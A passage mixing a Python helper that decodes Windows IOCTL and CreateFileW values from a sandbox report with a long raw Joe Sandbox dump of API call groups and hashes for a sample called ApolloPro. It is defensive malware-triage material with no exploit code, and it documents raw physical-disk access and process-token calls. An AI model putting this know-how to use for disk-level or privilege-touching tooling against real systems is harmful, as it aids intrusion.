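# Pass-through IOCTLs from ntddscsi.h, all CTL_CODE(IOCTL_SCSI_BASE, fn,
# METHOD_BUFFERED, FILE_READ_ACCESS|FILE_WRITE_ACCESS) unless noted.
KNOWN_IOCTLS = {
    0x0004D004: "IOCTL_SCSI_PASS_THROUGH",
    0x0004D008: "IOCTL_SCSI_MINIPORT",
    0x0004D014: "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    0x0004D028: "IOCTL_IDE_PASS_THROUGH",
    0x0004D02C: "IOCTL_ATA_PASS_THROUGH",
    0x0004D030: "IOCTL_ATA_PASS_THROUGH_DIRECT",
}
ATA_IDENTIFY_DEVICE_LEN = 512  # size of one IDENTIFY DEVICE data block


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Re-implementation of the CTL_CODE macro, used to cross-check decodes."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ctl_code(code: int) -> dict:
    """Split a control code into its fields and name it if it is a known IOCTL."""
    fields = {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }
    fields["device_name"] = DEVICE_TYPES.get(fields["device_type"], "unknown")
    fields["method_name"] = METHODS[fields["method"]]
    fields["access_name"] = ACCESS[fields["access"]]
    fields["name"] = KNOWN_IOCTLS.get(code)
    # Sanity check: the fields must rebuild the original code exactly.
    assert ctl_code(fields["device_type"], fields["function"],
                    fields["method"], fields["access"]) == code
    return fields


def decode_create_file(desired_access: int, share_mode: int,
                       disposition: int, flags: int) -> dict:
    """Name the CreateFileW arguments a sandbox prints as hex."""
    generic = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
    share = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
    dispositions = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
    return {
        "access": "|".join(n for b, n in generic.items() if desired_access & b),
        "share": "|".join(n for b, n in share.items() if share_mode & b),
        "disposition": dispositions.get(disposition, hex(disposition)),
        "normal_attribute": bool(flags & 0x80),  # FILE_ATTRIBUTE_NORMAL
    }


def describe_listing(ioctl: int, in_len: int, out_len: int) -> str:
    """One-line summary for a DeviceIoControl entry as printed by the sandbox."""
    d = decode_ctl_code(ioctl)
    name = d["name"] or f"unnamed function 0x{d['function']:03X}"
    note = ""
    if d["name"] in ("IOCTL_ATA_PASS_THROUGH", "IOCTL_IDE_PASS_THROUGH") \
            and out_len == ATA_IDENTIFY_DEVICE_LEN:
        note = "; 512-byte buffer matches an ATA IDENTIFY DEVICE response"
    return (f"0x{ioctl:08X} = {name} [{d['device_name']}, "
            f"{d['method_name']}, {d['access_name']}]{note}")


if __name__ == "__main__":
    # Values copied from the listing above.
    print(describe_listing(0x0004D02C, 0x200, 0x200))
    print(decode_create_file(0xC0000000, 0x3, 0x3, 0x80))
```

Run against the listing's values the decoder reports IOCTL_ATA_PASS_THROUGH on the SCSI controller base with METHOD_BUFFERED and read/write access, and a handle opened with GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE and OPEN_EXISTING, which is how a process talks to \\.\PhysicalDriveN. When triaging a report, decoding the raw code this way is quicker and less error-prone than matching the hex by eye against the headers.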
APIs
    • Part of subcall function 0064402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00697E51,?,?,00000000), ref: 00644041
    • Part of subcall function 0064402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00697E51,?,?,00000000,?,?), ref: 00644065
  • gethostbyname.WSOCK32(?,?,?), ref: 006A6A84
  • WSAGetLastError.WSOCK32(00000000), ref: 006A6A8F
  • _memmove.LIBCMT ref: 006A6ABC
  • inet_ntoa.WSOCK32(?), ref: 006A6AC7
Memory Dump Source
  • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
  • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
  • String ID:
  • API String ID: 1504782959-0
  • Opcode ID: 0799bf49e2282c1a23e5c51349f3aaa71bf7113290849c98dfba5d9f54a52c2f
  • Instruction ID: f3e46dfe9a1623d7b3b9459ba50108f333c8728ccd2b6766d3cd8f6cf70030ea
  • Opcode Fuzzy Hash: 0799bf49e2282c1a23e5c51349f3aaa71bf7113290849c98dfba5d9f54a52c2f
  • Instruction Fuzzy Hash: 52115171900108EFCB44FBA4CD86DEEB7BAEF05310B144169F502A72A2DF31AE14DBA5
APIs
    • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
  • DefDlgProcW.USER32(?,00000020,?), ref: 006316B4
  • GetClientRect.USER32(?,?), ref: 0066B93C
  • GetCursorPos.USER32(?), ref: 0066B946
  • ScreenToClient.USER32(?,?), ref: 0066B951
Memory Dump Source
  • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
  • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
  • API ID: Client$CursorLongProcRectScreenWindow
  • String ID:
  • API String ID: 4127811313-0
  • Opcode ID: 524dfea0b7cc5e95f077bbc30a034f416d5c5e245a4432ae34752b80a2dd181d
  • Instruction ID: 76bed02fcf6af65bd1c933d56909c2e9a5e6cc4c06c75581f6b0807ed7964408
  • Opcode Fuzzy Hash: 524dfea0b7cc5e95f077bbc30a034f416d5c5e245a4432ae34752b80a2dd181d
  • Instruction Fuzzy Hash: 16112575A00119EBDB00EF98C896DFE7BBAFB0A300F54045AF951EB250C730BA51CBA5
APIs
  • SendMessageW.USER32(?,000000B0,?,?), ref: 00689719
  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0068972B
  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00689741
  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0068975C
Memory Dump Source
  • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
  • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
  • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
  • API ID: MessageSend
  • String ID:
  • API String ID: 3850602802-0
  • Opcode ID: 4cb99cc30f9d82bccb272ef8d003fcb985058b67ec429e43ab8bbb84604abc4c
  • Instruction ID: 2fefb02a6a8662a04abbfd4c9d6935f61e539e6ca8e6278807206d687e75665b
  • Opcode Fuzzy Hash: 4cb99cc30f9d82bccb272ef8d003fcb985058b67ec429e43ab8bbb84604abc4c
  • Instruction Fuzzy Hash: B7115A39900218FFEB11EF95CD84EEDBBB9FB48710F204195EA00B7290D6716E11DBA4
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063214F
                                                                                              • GetStockObject.GDI32(00000011), ref: 00632163
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0063216D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3970641297-0
                                                                                              • Opcode ID: 73e6419af04a70904cdd4f4b17d7ed3dc07e96a3b38704ccec6dc38f2ce1f8db
                                                                                              • Instruction ID: f050b4a1f4ec5f25fd416543fd7ccad6dc46bdb0caba20787b31903778811a57
                                                                                              • Opcode Fuzzy Hash: 73e6419af04a70904cdd4f4b17d7ed3dc07e96a3b38704ccec6dc38f2ce1f8db
                                                                                              • Instruction Fuzzy Hash: DA118B7210120ABFEB024F94DD54EEABB6AEF59394F040116FB1452110C731DC61DBE0
                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006904EC,?,0069153F,?,00008000), ref: 0069195E
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006904EC,?,0069153F,?,00008000), ref: 00691983
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006904EC,?,0069153F,?,00008000), ref: 0069198D
                                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,006904EC,?,0069153F,?,00008000), ref: 006919C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                              • String ID:
                                                                                              • API String ID: 2875609808-0
                                                                                              • Opcode ID: 1dcc2bc386b8a9cf7e0bb2c65680d926076d980e2a5b0e914431d60fcd60e17d
                                                                                              • Instruction ID: 75eec5cf92826bce8bee4a31a07150822bab7f17ec8b9e90d53ab64c06aaf9e5
                                                                                              • Opcode Fuzzy Hash: 1dcc2bc386b8a9cf7e0bb2c65680d926076d980e2a5b0e914431d60fcd60e17d
                                                                                              • Instruction Fuzzy Hash: 25117C31C0061EDBDF009FE5D998AEEFB7AFF0A711F154055E984BA640CB3096508B91
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006BE1EA
                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 006BE201
                                                                                              • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 006BE216
                                                                                              • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 006BE234
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                                              • String ID:
                                                                                              • API String ID: 1352324309-0
                                                                                              • Opcode ID: c33513d650bcfb9aba533815e9ac42c300d2bc52b1ceefe502c450dc3072a64a
                                                                                              • Instruction ID: da0f9b21827de66dc411d8be87f45b0834bd6dc965d67e5872c9ba7bfccf8b26
                                                                                              • Opcode Fuzzy Hash: c33513d650bcfb9aba533815e9ac42c300d2bc52b1ceefe502c450dc3072a64a
                                                                                              • Instruction Fuzzy Hash: 96115EB5205304DBE3348F51DD09FE3BBFDEB00B04F108559A616D6150D7B1E6449BA1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction ID: 127b3e6ed1255af430f3021486b29f6a2b4f1cbc75a67a626460fdb5ea30595b
                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction Fuzzy Hash: 09019E3204814EBBCF125F84CC11CEE3F6BBB19358F188519FA1898231C336CAB1AB81
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 006BB956
                                                                                              • ScreenToClient.USER32(?,?), ref: 006BB96E
                                                                                              • ScreenToClient.USER32(?,?), ref: 006BB992
                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006BB9AD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: 60029b3e1e22a7a741cae5d348f0980fd6793ba7a5685489c164aafb9671bfa8
                                                                                              • Instruction ID: d8ac28c3a7543d20f1cffe467c38088cca8bc0711f836d7fabbef464972f3883
                                                                                              • Opcode Fuzzy Hash: 60029b3e1e22a7a741cae5d348f0980fd6793ba7a5685489c164aafb9671bfa8
                                                                                              • Instruction Fuzzy Hash: 661163B9D00209EFDB41DF99C884AEEBBF9FB48310F105156E914E3210D731AA618F50
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006BBCB6
                                                                                              • _memset.LIBCMT ref: 006BBCC5
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006F8F20,006F8F64), ref: 006BBCF4
                                                                                              • CloseHandle.KERNEL32 ref: 006BBD06
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3277943733-0
                                                                                              • Opcode ID: 04328b1ae19724b70924e21cdb19545d6f5850c21a000eb9617ac0a18b35ecd2
                                                                                              • Instruction ID: ba0e1d0e64ea40e5371a93bd5b4a2600e85c38432bf8a606d1aff1eacda594f4
                                                                                              • Opcode Fuzzy Hash: 04328b1ae19724b70924e21cdb19545d6f5850c21a000eb9617ac0a18b35ecd2
                                                                                              • Instruction Fuzzy Hash: 16F05EB2541354BFF7502B65AC05FBB3A5FEB09795F001461BE08D61A2DB754810C7A8
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 006971A1
                                                                                                • Part of subcall function 00697C7F: _memset.LIBCMT ref: 00697CB4
                                                                                              • _memmove.LIBCMT ref: 006971C4
                                                                                              • _memset.LIBCMT ref: 006971D1
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 006971E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 48991266-0
                                                                                              • Opcode ID: 5ec371cd53a8060978f9effd7535467b43fff3ac43c259e13b109a1995626bbe
                                                                                              • Instruction ID: 330deb47f9e5ce50c2edbca5cf818a3999e54f3886426cefe9d73605840f1d4f
                                                                                              • Opcode Fuzzy Hash: 5ec371cd53a8060978f9effd7535467b43fff3ac43c259e13b109a1995626bbe
                                                                                              • Instruction Fuzzy Hash: A3F05E7A200100AFCF416F55DC85F5ABB2AEF45361F08C056FE089F26ACB31A915DBB8
                                                                                              APIs
                                                                                                • Part of subcall function 006316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00631729
                                                                                                • Part of subcall function 006316CF: SelectObject.GDI32(?,00000000), ref: 00631738
                                                                                                • Part of subcall function 006316CF: BeginPath.GDI32(?), ref: 0063174F
                                                                                                • Part of subcall function 006316CF: SelectObject.GDI32(?,00000000), ref: 00631778
                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006BC3E8
                                                                                              • LineTo.GDI32(00000000,?,?), ref: 006BC3F5
                                                                                              • EndPath.GDI32(00000000), ref: 006BC405
                                                                                              • StrokePath.GDI32(00000000), ref: 006BC413
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                              • String ID:
                                                                                              • API String ID: 1539411459-0
                                                                                              • Opcode ID: 74bda57924d0dd4cb46cdd7723d52a83c63aff5bd9835889358f72f4d579e4f6
                                                                                              • Instruction ID: 82483f6657572afc98c7b442337d7f95a671c8d87fde7d9e5afbf8f16441830b
                                                                                              • Opcode Fuzzy Hash: 74bda57924d0dd4cb46cdd7723d52a83c63aff5bd9835889358f72f4d579e4f6
                                                                                              • Instruction Fuzzy Hash: B7F0BE31105268FAEB122F94AC0EFEE3F9BAF06321F048000FA11211E1C3741A60DBA9
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0068AA6F
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0068AA82
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0068AA89
                                                                                              • AttachThreadInput.USER32(00000000), ref: 0068AA90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2710830443-0
                                                                                              • Opcode ID: 8349c6c304633def94deb4201e556295e083e1bfa9c6348bfdf9e29d94a640d2
                                                                                              • Instruction ID: d47fa91330bfc43f3291b4a77f70df3a45effeb6729c0b35773c29cf0f2c7cc5
                                                                                              • Opcode Fuzzy Hash: 8349c6c304633def94deb4201e556295e083e1bfa9c6348bfdf9e29d94a640d2
                                                                                              • Instruction Fuzzy Hash: 80E03931541228BAFB216FA29D0CEE77F2EEF117A1F048112F90984450C6718550CBA0
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 0063260D
                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00632617
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0063262C
                                                                                              • GetStockObject.GDI32(00000005), ref: 00632634
                                                                                              • GetWindowDC.USER32(?,00000000), ref: 0066C1C4
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0066C1D1
                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0066C1EA
                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0066C203
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0066C223
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0066C22E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1946975507-0
                                                                                              • Opcode ID: ff7b958b2a12bf7d17bc973ba8c9e4cfa111ec6b5f0afaee76abb403851206f7
                                                                                              • Instruction ID: 7143c02162df08dd05bf72ef29351e552d8eb8ba11be4d6410808fa07edee22c
                                                                                              • Opcode Fuzzy Hash: ff7b958b2a12bf7d17bc973ba8c9e4cfa111ec6b5f0afaee76abb403851206f7
                                                                                              • Instruction Fuzzy Hash: B6E0ED31504644FBEB215FA8AC4DFF87B16EB16332F188366FAA9980E187714A90DB11
                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 00689339
                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00688F04), ref: 00689340
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00688F04), ref: 0068934D
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00688F04), ref: 00689354
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                              • String ID:
                                                                                              • API String ID: 3974789173-0
                                                                                              • Opcode ID: 433fdd5dd207fd1297b0833d143739a42a8b9f6180a972e1d775e68eccd19119
                                                                                              • Instruction ID: 31f3aeccdd478a27dbc00fa8b6bb2744f49a400693fc91ddbf1688f23545b65e
                                                                                              • Opcode Fuzzy Hash: 433fdd5dd207fd1297b0833d143739a42a8b9f6180a972e1d775e68eccd19119
                                                                                              • Instruction Fuzzy Hash: 67E08636701211DFE7202FB15D0DFB63B6EEF54791F154818B346CA090E6349444D760
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00670679
                                                                                              • GetDC.USER32(00000000), ref: 00670683
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006706A3
                                                                                              • ReleaseDC.USER32(?), ref: 006706C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
